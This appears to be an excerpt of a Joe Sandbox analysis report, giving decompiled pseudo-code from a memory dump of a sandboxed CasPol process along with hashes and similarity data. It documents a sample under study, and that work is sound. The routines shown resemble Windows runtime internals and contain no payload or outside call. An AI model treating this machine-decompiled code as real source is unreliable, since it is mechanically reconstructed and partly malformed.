                                                                  						_t124[4] = _t124[4] | 0x00000001;
                                                                  						_v12 = _v12 & 0x00000000;
                                                                  						_push(4);
                                                                  						_push( &_v12);
                                                                  						_push(5);
                                                                  						_push(0xfffffffe);
                                                                  						L014395B0();
                                                                  						goto L12;
                                                                  					}
                                                                  					goto L9;
                                                                  				} else {
                                                                  					return 0xc0000017;
                                                                  				}
                                                                  			}




















                                                                  0x0148b95a
                                                                  0x0148b95e
                                                                  0x0148b972
                                                                  0x0148b979
                                                                  0x0148b97d
                                                                  0x0148b97f
                                                                  0x0148b980
                                                                  0x0148b982
                                                                  0x0148b984
                                                                  0x00000000
                                                                  0x0148b984
                                                                  0x00000000
                                                                  0x0148b926
                                                                  0x00000000
                                                                  0x0148b926

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 12a38f7acc35a91667cd41301d47eb52ea65f0437ee0d2629ee88725099e85e9
                                                                  • Instruction ID: aeb0d78ec9d380190e167b7e4bfef1e2e5f40db5fc2174a91104f03bb606977f
                                                                  • Opcode Fuzzy Hash: 12a38f7acc35a91667cd41301d47eb52ea65f0437ee0d2629ee88725099e85e9
                                                                  • Instruction Fuzzy Hash: E4710F32200B02AFE732EF19C840F6ABBE5EB54724F14452EE6558B7B1DBB1E941CB50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 78%
                                                                  			E013F52A5(char __ecx) {
                                                                  				char _v20;
                                                                  				char _v28;
                                                                  				char _v29;
                                                                  				void* _v32;
                                                                  				void* _v36;
                                                                  				void* _v37;
                                                                  				void* _v38;
                                                                  				void* _v40;
                                                                  				void* _v46;
                                                                  				void* _v64;
                                                                  				void* __ebx;
                                                                  				intOrPtr* _t49;
                                                                  				signed int _t53;
                                                                  				short _t85;
                                                                  				signed int _t87;
                                                                  				signed int _t88;
                                                                  				signed int _t89;
                                                                  				intOrPtr _t101;
                                                                  				intOrPtr* _t102;
                                                                  				intOrPtr* _t104;
                                                                  				signed int _t106;
                                                                  				void* _t108;
                                                                  
                                                                  				_t93 = __ecx;
                                                                  				_t108 = (_t106 & 0xfffffff8) - 0x1c;
                                                                  				_push(_t88);
                                                                  				_v29 = __ecx;
                                                                  				_t89 = _t88 | 0xffffffff;
                                                                  				while(1) {
                                                                  					L0140EEF0(0x14e79a0);
                                                                  					_t104 =  *0x14e8210; // 0xf92d08
                                                                  					if(_t104 == 0) {
                                                                  						break;
                                                                  					}
                                                                  					asm("lock inc dword [esi]");
                                                                  					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
                                                                  					E0140EB70(_t93, 0x14e79a0);
                                                                  					if( *((char*)(_t108 + 0xf)) != 0) {
                                                                  						_t101 =  *0x7ffe02dc;
                                                                  						__eflags =  *(_t104 + 0x14) & 0x00000001;
                                                                  						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
                                                                  							L9:
                                                                  							_push(0);
                                                                  							_push(0);
                                                                  							_push(0);
                                                                  							_push(0);
                                                                  							_push(0x90028);
                                                                  							_push(_t108 + 0x20);
                                                                  							_push(0);
                                                                  							_push(0);
                                                                  							_push(0);
                                                                  							_push( *((intOrPtr*)(_t104 + 4)));
                                                                  							_t53 = E01439890();
                                                                  							__eflags = _t53;
                                                                  							if(_t53 >= 0) {
                                                                  								__eflags =  *(_t104 + 0x14) & 0x00000001;
                                                                  								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
                                                                  									L0140EEF0(0x14e79a0);
                                                                  									 *((intOrPtr*)(_t104 + 8)) = _t101;
                                                                  									E0140EB70(0, 0x14e79a0);
                                                                  								}
                                                                  								goto L3;
                                                                  							}
                                                                  							__eflags = _t53 - 0xc0000012;
                                                                  							if(__eflags == 0) {
                                                                  								L12:
                                                                  								_t13 = _t104 + 0xc; // 0xf92d15
                                                                  								_t93 = _t13;
                                                                  								 *((char*)(_t108 + 0x12)) = 0;
                                                                  								__eflags = E0142F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                                                                  								if(__eflags >= 0) {
                                                                  									L15:
                                                                  									_t102 = _v28;
                                                                  									 *_t102 = 2;
                                                                  									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                                                  									L0140EEF0(0x14e79a0);
                                                                  									__eflags =  *0x14e8210 - _t104; // 0xf92d08
                                                                  									if(__eflags == 0) {
                                                                  										__eflags =  *((char*)(_t108 + 0xe));
                                                                  										_t95 =  *((intOrPtr*)(_t108 + 0x14));
                                                                  										 *0x14e8210 = _t102;
                                                                  										_t32 = _t102 + 0xc; // 0x0
                                                                  										 *_t95 =  *_t32;
                                                                  										_t33 = _t102 + 0x10; // 0x0
                                                                  										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
                                                                  										_t35 = _t102 + 4; // 0xffffffff
                                                                  										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
                                                                  										if(__eflags != 0) {
                                                                  											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
                                                                  											E01474888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
                                                                  										}
                                                                  										E0140EB70(_t95, 0x14e79a0);
                                                                  										asm("lock xadd [esi], eax");
                                                                  										if(__eflags == 0) {
                                                                  											_push( *((intOrPtr*)(_t104 + 4)));
                                                                  											E014395D0();
                                                                  											L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                                  											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                                  										}
                                                                  										asm("lock xadd [esi], ebx");
                                                                  										__eflags = _t89 == 1;
                                                                  										if(_t89 == 1) {
                                                                  											_push( *((intOrPtr*)(_t104 + 4)));
                                                                  											E014395D0();
                                                                  											L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                                  											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                                  										}
                                                                  										_t49 = _t102;
                                                                  										L4:
                                                                  										return _t49;
                                                                  									}
                                                                  									E0140EB70(_t93, 0x14e79a0);
                                                                  									asm("lock xadd [esi], eax");
                                                                  									if(__eflags == 0) {
                                                                  										_push( *((intOrPtr*)(_t104 + 4)));
                                                                  										E014395D0();
                                                                  										L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                                                  										_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                                                  									}
                                                                  									 *_t102 = 1;
                                                                  									asm("lock xadd [edi], eax");
                                                                  									if(__eflags == 0) {
                                                                  										_t28 = _t102 + 4; // 0xffffffff
                                                                  										_push( *_t28);
                                                                  										E014395D0();
                                                                  										L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
                                                                  									}
                                                                  									continue;
                                                                  								}
                                                                  								_t93 =  &_v20;
                                                                  								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
                                                                  								_t85 = 6;
                                                                  								_v20 = _t85;
                                                                  								_t87 = E0142F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                                                                  								__eflags = _t87;
                                                                  								if(_t87 < 0) {
                                                                  									goto L3;
                                                                  								}
                                                                  								 *((char*)(_t108 + 0xe)) = 1;
                                                                  								goto L15;
                                                                  							}
                                                                  							__eflags = _t53 - 0xc000026e;
                                                                  							if(__eflags != 0) {
                                                                  								goto L3;
                                                                  							}
                                                                  							goto L12;
                                                                  						}
                                                                  						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
                                                                  						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
                                                                  							goto L3;
                                                                  						} else {
                                                                  							goto L9;
                                                                  						}
                                                                  					}
                                                                  					L3:
                                                                  					_t49 = _t104;
                                                                  					goto L4;
                                                                  				}
                                                                  				_t49 = 0;
                                                                  				goto L4;
                                                                  			}


























                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 228bc4f033d46c8aeb77c65b9cc06322fe8fa15005fd7534f9d48ff9b4ef71c4
                                                                  • Instruction ID: 9b37e5ea3b7b504fc8f8aa2e12fa20865fd693afd1c1ba88650cb54a40157be5
                                                                  • Opcode Fuzzy Hash: 228bc4f033d46c8aeb77c65b9cc06322fe8fa15005fd7534f9d48ff9b4ef71c4
                                                                  • Instruction Fuzzy Hash: D8510075104742ABD322EF6AC840B27BBE4FFA4724F14091FF995876A2E774E844C792
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E01422AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
                                                                  				signed short* _v8;
                                                                  				signed short* _v12;
                                                                  				intOrPtr _v16;
                                                                  				intOrPtr _v20;
                                                                  				intOrPtr _v24;
                                                                  				intOrPtr* _v28;
                                                                  				signed int _v32;
                                                                  				signed int _v36;
                                                                  				short _t56;
                                                                  				signed int _t57;
                                                                  				intOrPtr _t58;
                                                                  				signed short* _t61;
                                                                  				intOrPtr _t72;
                                                                  				intOrPtr _t75;
                                                                  				intOrPtr _t84;
                                                                  				intOrPtr _t87;
                                                                  				intOrPtr* _t90;
                                                                  				signed short* _t91;
                                                                  				signed int _t95;
                                                                  				signed short* _t96;
                                                                  				intOrPtr _t97;
                                                                  				intOrPtr _t102;
                                                                  				signed int _t108;
                                                                  				intOrPtr _t110;
                                                                  				signed int _t111;
                                                                  				signed short* _t112;
                                                                  				void* _t113;
                                                                  				signed int _t116;
                                                                  				signed short** _t119;
                                                                  				short* _t120;
                                                                  				signed int _t123;
                                                                  				signed int _t124;
                                                                  				void* _t125;
                                                                  				intOrPtr _t127;
                                                                  				signed int _t128;
                                                                  
                                                                  				_t90 = __ecx;
                                                                  				_v16 = __edx;
                                                                  				_t108 = _a4;
                                                                  				_v28 = __ecx;
                                                                  				_t4 = _t108 - 1; // -1
                                                                  				if(_t4 > 0x13) {
                                                                  					L15:
                                                                  					_t56 = 0xc0000100;
                                                                  					L16:
                                                                  					return _t56;
                                                                  				}
                                                                  				_t57 = _t108 * 0x1c;
                                                                  				_v32 = _t57;
                                                                  				_t6 = _t57 + 0x14e8204; // 0x0
                                                                  				_t123 =  *_t6;
                                                                  				_t7 = _t57 + 0x14e8208; // 0x14e8207
                                                                  				_t8 = _t57 + 0x14e8208; // 0x14e8207
                                                                  				_t119 = _t8;
                                                                  				_v36 = _t123;
                                                                  				_t110 = _t7 + _t123 * 8;
                                                                  				_v24 = _t110;
                                                                  				_t111 = _a4;
                                                                  				if(_t119 >= _t110) {
                                                                  					L12:
                                                                  					if(_t123 != 3) {
                                                                  						_t58 =  *0x14e8450; // 0x0
                                                                  						if(_t58 == 0) {
                                                                  							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
                                                                  						}
                                                                  					} else {
                                                                  						_t26 = _t57 + 0x14e821c; // 0x0
                                                                  						_t58 =  *_t26;
                                                                  					}
                                                                  					 *_t90 = _t58;
                                                                  					goto L15;
                                                                  				} else {
                                                                  					goto L2;
                                                                  				}
                                                                  				while(1) {
                                                                  					_t116 =  *_t61 & 0x0000ffff;
                                                                  					_t128 =  *(_t127 + _t61) & 0x0000ffff;
                                                                  					if(_t116 == _t128) {
                                                                  						goto L18;
                                                                  					}
                                                                  					L5:
                                                                  					if(_t116 >= 0x61) {
                                                                  						if(_t116 > 0x7a) {
                                                                  							_t97 =  *0x14e6d5c; // 0x7fad0654
                                                                  							_t72 =  *0x14e6d5c; // 0x7fad0654
                                                                  							_t75 =  *0x14e6d5c; // 0x7fad0654
                                                                  							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
                                                                  						} else {
                                                                  							_t116 = _t116 - 0x20;
                                                                  						}
                                                                  					}
                                                                  					if(_t128 >= 0x61) {
                                                                  						if(_t128 > 0x7a) {
                                                                  							_t102 =  *0x14e6d5c; // 0x7fad0654
                                                                  							_t84 =  *0x14e6d5c; // 0x7fad0654
                                                                  							_t87 =  *0x14e6d5c; // 0x7fad0654
                                                                  							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
                                                                  						} else {
                                                                  							_t128 = _t128 - 0x20;
                                                                  						}
                                                                  					}
                                                                  					if(_t116 == _t128) {
                                                                  						_t61 = _v12;
                                                                  						_t96 = _v8;
                                                                  					} else {
                                                                  						_t113 = _t116 - _t128;
                                                                  						L9:
                                                                  						_t111 = _a4;
                                                                  						if(_t113 == 0) {
                                                                  							_t115 =  &(( *_t119)[_t111 + 1]);
                                                                  							_t33 =  &(_t119[1]); // 0x100
                                                                  							_t120 = _a8;
                                                                  							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
                                                                  							_t35 = _t95 - 1; // 0xff
                                                                  							_t124 = _t35;
                                                                  							if(_t120 == 0) {
                                                                  								L27:
                                                                  								 *_a16 = _t95;
                                                                  								_t56 = 0xc0000023;
                                                                  								goto L16;
                                                                  							}
                                                                  							if(_t124 >= _a12) {
                                                                  								if(_a12 >= 1) {
                                                                  									 *_t120 = 0;
                                                                  								}
                                                                  								goto L27;
                                                                  							}
                                                                  							 *_a16 = _t124;
                                                                  							_t125 = _t124 + _t124;
                                                                  							E0143F3E0(_t120, _t115, _t125);
                                                                  							_t56 = 0;
                                                                  							 *((short*)(_t125 + _t120)) = 0;
                                                                  							goto L16;
                                                                  						}
                                                                  						_t119 =  &(_t119[2]);
                                                                  						if(_t119 < _v24) {
                                                                  							L2:
                                                                  							_t91 =  *_t119;
                                                                  							_t61 = _t91;
                                                                  							_v12 = _t61;
                                                                  							_t112 =  &(_t61[_t111]);
                                                                  							_v8 = _t112;
                                                                  							if(_t61 >= _t112) {
                                                                  								break;
                                                                  							} else {
                                                                  								_t127 = _v16 - _t91;
                                                                  								_t96 = _t112;
                                                                  								_v20 = _t127;
                                                                  								_t116 =  *_t61 & 0x0000ffff;
                                                                  								_t128 =  *(_t127 + _t61) & 0x0000ffff;
                                                                  								if(_t116 == _t128) {
                                                                  									goto L18;
                                                                  								}
                                                                  								goto L5;
                                                                  							}
                                                                  						} else {
                                                                  							_t90 = _v28;
                                                                  							_t57 = _v32;
                                                                  							_t123 = _v36;
                                                                  							goto L12;
                                                                  						}
                                                                  					}
                                                                  					L18:
                                                                  					_t61 =  &(_t61[1]);
                                                                  					_v12 = _t61;
                                                                  					if(_t61 >= _t96) {
                                                                  						break;
                                                                  					}
                                                                  					_t127 = _v20;
                                                                  				}
                                                                  				_t113 = 0;
                                                                  				goto L9;
                                                                  			}


                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0f9dab66214181841709d7415804898aa3e6ecebea1b9cb87829621c865a2970
                                                                  • Instruction ID: a66a2939f5569168bbdb14e7afd6568099017c602ba2132157c3ba5c93f5b7bc
                                                                  • Opcode Fuzzy Hash: 0f9dab66214181841709d7415804898aa3e6ecebea1b9cb87829621c865a2970
                                                                  • Instruction Fuzzy Hash: 5751BF76E001258F8B14CF1CC480DBDBBF1BB88700B46845BE8569B375D670AA92CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 86%
                                                                  			E0141DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                  				char _v5;
                                                                  				signed int _v12;
                                                                  				signed int* _v16;
                                                                  				intOrPtr _v20;
                                                                  				intOrPtr _v24;
                                                                  				intOrPtr _v28;
                                                                  				intOrPtr _v32;
                                                                  				intOrPtr _v36;
                                                                  				intOrPtr _v40;
                                                                  				intOrPtr _v44;
                                                                  				void* __ebx;
                                                                  				void* __edi;
                                                                  				signed int _t54;
                                                                  				char* _t58;
                                                                  				signed int _t66;
                                                                  				intOrPtr _t67;
                                                                  				intOrPtr _t68;
                                                                  				intOrPtr _t72;
                                                                  				intOrPtr _t73;
                                                                  				signed int* _t75;
                                                                  				intOrPtr _t79;
                                                                  				intOrPtr _t80;
                                                                  				char _t82;
                                                                  				signed int _t83;
                                                                  				signed int _t84;
                                                                  				signed int _t88;
                                                                  				signed int _t89;
                                                                  				intOrPtr _t90;
                                                                  				intOrPtr _t92;
                                                                  				signed int _t97;
                                                                  				intOrPtr _t98;
                                                                  				intOrPtr* _t99;
                                                                  				signed int* _t101;
                                                                  				signed int* _t102;
                                                                  				intOrPtr* _t103;
                                                                  				intOrPtr _t105;
                                                                  				signed int _t106;
                                                                  				void* _t118;
                                                                  
                                                                  				_t92 = __edx;
                                                                  				_t75 = _a4;
                                                                  				_t98 = __ecx;
                                                                  				_v44 = __edx;
                                                                  				_t106 = _t75[1];
                                                                  				_v40 = __ecx;
                                                                  				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
                                                                  					_t82 = 0;
                                                                  				} else {
                                                                  					_t82 = 1;
                                                                  				}
                                                                  				_v5 = _t82;
                                                                  				_t6 = _t98 + 0xc8; // 0xc9
                                                                  				_t101 = _t6;
                                                                  				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
                                                                  				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
                                                                  				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
                                                                  				if(_t82 != 0) {
                                                                  					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
                                                                  					_t83 =  *_t75;
                                                                  					_t54 = _t75[1];
                                                                  					 *_t101 = _t83;
                                                                  					_t84 = _t83 | _t54;
                                                                  					_t101[1] = _t54;
                                                                  					if(_t84 == 0) {
                                                                  						_t101[1] = _t101[1] & _t84;
                                                                  						 *_t101 = 1;
                                                                  					}
                                                                  					goto L19;
                                                                  				} else {
                                                                  					if(_t101 == 0) {
                                                                  						L013FCC50(E013F4510(0xc000000d));
                                                                  						_t88 =  *_t101;
                                                                  						_t97 = _t101[1];
                                                                  						L15:
                                                                  						_v12 = _t88;
                                                                  						_t66 = _t88 -  *_t75;
                                                                  						_t89 = _t97;
                                                                  						asm("sbb ecx, [ebx+0x4]");
                                                                  						_t118 = _t89 - _t97;
                                                                  						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
                                                                  							_t66 = _t66 | 0xffffffff;
                                                                  							_t89 = 0x7fffffff;
                                                                  						}
                                                                  						 *_t101 = _t66;
                                                                  						_t101[1] = _t89;
                                                                  						L19:
                                                                  						if(E01417D50() != 0) {
                                                                  							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                  						} else {
                                                                  							_t58 = 0x7ffe0386;
                                                                  						}
                                                                  						_t102 = _v16;
                                                                  						if( *_t58 != 0) {
                                                                  							_t58 = L014C8ED6(_t102, _t98);
                                                                  						}
                                                                  						_t76 = _v44;
                                                                  						E01412280(_t58, _v44);
                                                                  						L0141DD82(_v44, _t102, _t98);
                                                                  						E0141B944(_t102, _v5);
                                                                  						return L0140FFB0(_t76, _t98, _t76);
                                                                  					}
                                                                  					_t99 = 0x7ffe03b0;
                                                                  					do {
                                                                  						_t103 = 0x7ffe0010;
                                                                  						do {
                                                                  							_t67 =  *0x14e8628; // 0x0
                                                                  							_v28 = _t67;
                                                                  							_t68 =  *0x14e862c; // 0x0
                                                                  							_v32 = _t68;
                                                                  							_v24 =  *((intOrPtr*)(_t99 + 4));
                                                                  							_v20 =  *_t99;
                                                                  							while(1) {
                                                                  								_t97 =  *0x7ffe000c;
                                                                  								_t90 =  *0x7FFE0008;
                                                                  								if(_t97 ==  *_t103) {
                                                                  									goto L10;
                                                                  								}
                                                                  								asm("pause");
                                                                  							}
                                                                  							L10:
                                                                  							_t79 = _v24;
                                                                  							_t99 = 0x7ffe03b0;
                                                                  							_v12 =  *0x7ffe03b0;
                                                                  							_t72 =  *0x7FFE03B4;
                                                                  							_t103 = 0x7ffe0010;
                                                                  							_v36 = _t72;
                                                                  						} while (_v20 != _v12 || _t79 != _t72);
                                                                  						_t73 =  *0x14e8628; // 0x0
                                                                  						_t105 = _v28;
                                                                  						_t80 =  *0x14e862c; // 0x0
                                                                  					} while (_t105 != _t73 || _v32 != _t80);
                                                                  					_t98 = _v40;
                                                                  					asm("sbb edx, [ebp-0x20]");
                                                                  					_t88 = _t90 - _v12 - _t105;
                                                                  					_t75 = _a4;
                                                                  					asm("sbb edx, eax");
                                                                  					_t31 = _t98 + 0xc8; // 0x14bfb53
                                                                  					_t101 = _t31;
                                                                  					 *_t101 = _t88;
                                                                  					_t101[1] = _t97;
                                                                  					goto L15;
                                                                  				}
                                                                  			}










































                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ba39821fc667ef5be31beaf08064fff4bb4a557488a8109bf093b549da4ad79b
                                                                  • Instruction ID: 22eea69ff99347efe40dbedc0a1a9e160326fab167267e6bf242e2e309588f2b
                                                                  • Opcode Fuzzy Hash: ba39821fc667ef5be31beaf08064fff4bb4a557488a8109bf093b549da4ad79b
                                                                  • Instruction Fuzzy Hash: AE51AFB1E00206CFCB14CFA8C484AAEFBF5BB58310F24855BD559A7369EB70A945CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 97%
                                                                  			E01422990() {
                                                                  				signed int* _t62;
                                                                  				signed int _t64;
                                                                  				intOrPtr _t66;
                                                                  				intOrPtr* _t69;
                                                                  				intOrPtr _t76;
                                                                  				intOrPtr* _t79;
                                                                  				void* _t81;
                                                                  				signed int _t82;
                                                                  				intOrPtr* _t83;
                                                                  				signed int _t87;
                                                                  				intOrPtr _t91;
                                                                  				void* _t98;
                                                                  				intOrPtr _t99;
                                                                  				void* _t101;
                                                                  				signed int* _t102;
                                                                  				void* _t103;
                                                                  				void* _t104;
                                                                  				void* _t107;
                                                                  
                                                                  				_push(0x20);
                                                                  				_push(0x14cff00);
                                                                  				E0144D08C(_t81, _t98, _t101);
                                                                  				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
                                                                  				_t99 = 0;
                                                                  				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
                                                                  				_t82 =  *((intOrPtr*)(_t103 + 0x10));
                                                                  				if(_t82 == 0) {
                                                                  					_t62 = 0xc0000100;
                                                                  				} else {
                                                                  					 *((intOrPtr*)(_t103 - 4)) = 0;
                                                                  					_t102 = 0xc0000100;
                                                                  					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
                                                                  					_t64 = 4;
                                                                  					while(1) {
                                                                  						 *(_t103 - 0x24) = _t64;
                                                                  						if(_t64 == 0) {
                                                                  							break;
                                                                  						}
                                                                  						_t87 = _t64 * 0xc;
                                                                  						 *(_t103 - 0x2c) = _t87;
                                                                  						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x13d1664));
                                                                  						if(_t107 <= 0) {
                                                                  							if(_t107 == 0) {
                                                                  								_t79 = L0143E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x13d1668)), _t82);
                                                                  								_t104 = _t104 + 0xc;
                                                                  								__eflags = _t79;
                                                                  								if(__eflags == 0) {
                                                                  									_t102 = E014751BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x13d166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                                                                  									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
                                                                  									break;
                                                                  								} else {
                                                                  									_t64 =  *(_t103 - 0x24);
                                                                  									goto L5;
                                                                  								}
                                                                  								goto L13;
                                                                  							} else {
                                                                  								L5:
                                                                  								_t64 = _t64 - 1;
                                                                  								continue;
                                                                  							}
                                                                  						}
                                                                  						break;
                                                                  					}
                                                                  					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                                                  					__eflags = _t102;
                                                                  					if(_t102 < 0) {
                                                                  						__eflags = _t102 - 0xc0000100;
                                                                  						if(_t102 == 0xc0000100) {
                                                                  							_t83 =  *((intOrPtr*)(_t103 + 8));
                                                                  							__eflags = _t83;
                                                                  							if(_t83 != 0) {
                                                                  								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
                                                                  								__eflags =  *_t83 - _t99;
                                                                  								if( *_t83 == _t99) {
                                                                  									_t102 = 0xc0000100;
                                                                  									goto L19;
                                                                  								} else {
                                                                  									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
                                                                  									_t66 =  *((intOrPtr*)(_t91 + 0x10));
                                                                  									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
                                                                  									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
                                                                  										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
                                                                  										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
                                                                  											L26:
                                                                  											_t102 = E01422AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                                                                  											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                                                  											__eflags = _t102 - 0xc0000100;
                                                                  											if(_t102 != 0xc0000100) {
                                                                  												goto L12;
                                                                  											} else {
                                                                  												_t99 = 1;
                                                                  												_t83 =  *((intOrPtr*)(_t103 - 0x20));
                                                                  												goto L18;
                                                                  											}
                                                                  										} else {
                                                                  											_t69 = L01406600( *((intOrPtr*)(_t91 + 0x1c)));
                                                                  											__eflags = _t69;
                                                                  											if(_t69 != 0) {
                                                                  												goto L26;
                                                                  											} else {
                                                                  												_t83 =  *((intOrPtr*)(_t103 + 8));
                                                                  												goto L18;
                                                                  											}
                                                                  										}
                                                                  									} else {
                                                                  										L18:
                                                                  										_t102 = L01422C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
                                                                  										L19:
                                                                  										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                                                                  										goto L12;
                                                                  									}
                                                                  								}
                                                                  								L28:
                                                                  							} else {
                                                                  								L0140EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                  								 *((intOrPtr*)(_t103 - 4)) = 1;
                                                                  								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
                                                                  								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
                                                                  								_t76 = E01422AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
                                                                  								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
                                                                  								__eflags = _t76 - 0xc0000100;
                                                                  								if(_t76 == 0xc0000100) {
                                                                  									 *((intOrPtr*)(_t103 - 0x1c)) = L01422C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
                                                                  								}
                                                                  								 *((intOrPtr*)(_t103 - 4)) = _t99;
                                                                  								E01422ACB();
                                                                  							}
                                                                  						}
                                                                  					}
                                                                  					L12:
                                                                  					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
                                                                  					_t62 = _t102;
                                                                  				}
                                                                  				L13:
                                                                  				return E0144D0D1(_t62);
                                                                  				goto L28;
                                                                  			}

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
